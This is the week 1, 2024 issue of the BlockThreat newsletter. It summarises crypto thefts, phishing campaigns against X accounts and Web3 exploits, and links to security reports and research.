BlockThreat - Week 1, 2024
CertiK | CoinsPaid | Gamma | Radiant | Channels | LootDAO
We begin our year with a mass X compromise of government, crypto, and even security companies’ accounts to spread crypto drainers.
PSA: Ongoing phishing campaign involving fake journalists directing victims to a Calendly-like phishing site designed to hijack X account permissions.
More than $18M were stolen this week across four incidents. Coinspaid suffered the largest losses in yet another hot wallet compromise worth $7.5M. Two protocols lost combined $4.75M to the well known rounding issue on newly deployed pools that many AAVEv2 forks fail to defend against. Gamma experienced an $6.18M price manipulation exploit due to insufficient price change controls.
To gain access to comprehensive vulnerability write-ups, post-mortems, exploit proof of concepts (PoCs), attacker addresses, and additional data regarding this week’s compromises, please subscribe to the premium plan below.
Let’s dive into the news!
Hack3d: The Web3 Security Report 2023 by CertiK.
Annual Web3 Security Report 2023 by QuillAudits.
Reports of an ongoing LFG phishing attack using Solana-based drainers. One victim reported losing $125K.
AragonDAO lost $800K in a fake airdrop phishing attack.
CertiK X account phished using a malicious Calendly link described above.
Mandiant's X account hacked by crypto Drainer-as-a-Service gang. Bad actors used Mandiant’s account to post a link to a Phantom wallet phishing site.
Three New Malicious PyPI Packages Deploy CoinMiner on Linux Devices by Gabby Xiong (Fortinet).
Uniswap V4: Oracle hook with malicious owner by Damian Rusinek (Composable Security).
Echidna: Invariant Tests for AMM Contracts by Bloqarl.
A Guide to Crafting Robust Invariants by Chirag Agrawal and Antonio Viggiano.
Notes on Solidity with highlights of security caviats by Chinmay Farkya.
Tag, you’re it: Signal tagging in Circom by Tjaden Hess (Trail of Bits).
zkEVM Bootcamp homework and notes by ustas.eth.
Enjoy reading BlockThreat? Consider sponsoring the next edition or becoming a paid subscriber to unlock the premium section with detailed information on hacks, vulnerability, indicators, special reports, and searchable newsletter archives.